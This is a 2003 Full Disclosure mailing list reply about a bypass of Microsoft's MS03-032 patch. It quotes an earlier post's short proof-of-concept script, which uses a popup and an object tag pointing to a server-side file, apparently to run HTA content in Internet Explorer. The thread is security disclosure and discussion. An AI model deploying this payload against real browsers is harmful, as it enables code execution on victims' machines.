Full Disclosure mailing list archives
RE: BAD NEWS: Microsoft Security Bulletin MS03-032
From: "Richard M. Smith" <rms () computerbytesman com>
Date: Sun, 7 Sep 2003 14:38:13 -0400
Can this bug also be fixed by changing the MIME type of HTA files from "application/hta" to something else? If so, what other MIME types need to be switched to avoid the <OBJECT DATA=>? Any thoughts why .HTA files have a MIME type in the first place?

Richard

-----Original Message-----
From: full-disclosure-admin () lists netsys com [mailto:full-disclosure-admin () lists netsys com] On Behalf Of http-equiv () excite com
Sent: Sunday, September 07, 2003 9:17 AM
To: full-disclosure () lists netsys com
Subject: [Full-disclosure] BAD NEWS: Microsoft Security Bulletin MS03-032

Since the cat somehow got out of the bag, and more importantly, this is so blatantly obvious, herewith is the "Bad News":

The patch for Drew's object data=funky.hta doesn't work:

http://www.malware.com/badnews.html

<script>
var oPopup = window.createPopup();
function showPopup() {
    oPopup.document.body.innerHTML = "<object data=ouch.php>";
    oPopup.show(0,0,1,1,document.body);
}
showPopup()
</script>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html